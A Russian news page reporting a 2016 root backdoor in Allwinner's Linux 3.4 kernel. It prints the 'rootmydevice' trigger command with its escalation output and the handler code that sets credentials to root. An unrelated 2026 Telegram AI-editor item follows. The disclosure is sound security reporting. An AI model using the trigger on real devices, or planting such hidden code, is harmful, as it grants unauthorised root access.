Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Александр Панасенко 10 Мая 2016 - 17:58

...

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root)

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10.

Следующая главная новость »

Российские альтернативы Microsoft CA: чем заменить и не проиграть?
Регистрируйтесь на эфир!

Екатерина Быстрова 27 Марта 2026 - 11:32

GenAI (генеративный искусственный интеллект) Домашние пользователи

Telegram добавит ИИ для переписывания и перевода текста прямо в чате

Telegram старается не оставаться в стороне от ИИ-гонки. В бета-версии мессенджера для Android разработчики начали тестировать новые ИИ-инструменты, и один из самых заметных — встроенный помощник для редактирования и перевода сообщений прямо в чате.

По данным ресурса «Код Дурова», теперь можно будет попросить Telegram переписать текст, исправить ошибки или перевести сообщение.

Причём речь идёт не только о банальной правке опечаток. Пользователь сможет, например, сделать сообщение более формальным, сократить его или вообще переписать в заданной манере — от делового стиля до, как сообщается, даже «викингского».

Чтобы появилась кнопка AI Editor, нужно набрать как минимум три строки текста. После этого справа от поля ввода отображается иконка AI. Нажатие запускает обработку, а готовый вариант можно сразу отправить вместо исходного текста.

По сути, Telegram встроил в чат мини-редактор, который может пригодиться и для обычной переписки, и для более рабочих задач, например, если нужно быстро привести сообщение в порядок, сделать его вежливее или подготовить публикацию без помощи сторонних сервисов.

Судя по описанию в бета-версии, доступ к функции будет отличаться для разных пользователей. Базовым юзерам обещают ограниченное количество генераций, а вот у подписчиков Telegram Premium лимит окажется в 50 раз выше.

Пока AI Editor доступен только в бета-версии Telegram для Android, так что до полноценного массового запуска ещё может пройти какое-то время. Но само направление уже вполне очевидно: мессенджеры всё активнее превращаются не просто в средство общения, а в площадку, где ИИ начинает помогать пользователю прямо по ходу переписки.

Напомним, вчера президент «Ростелекома» Михаил Осеевский выступил с довольно жёсткими заявлениями о ситуации на рынке связи. По его словам, в России резко вырос интерес к установке стационарных телефонов, а Telegram «умирает прямо сейчас».

Российские альтернативы Microsoft CA: чем заменить и не проиграть?
Регистрируйтесь на эфир!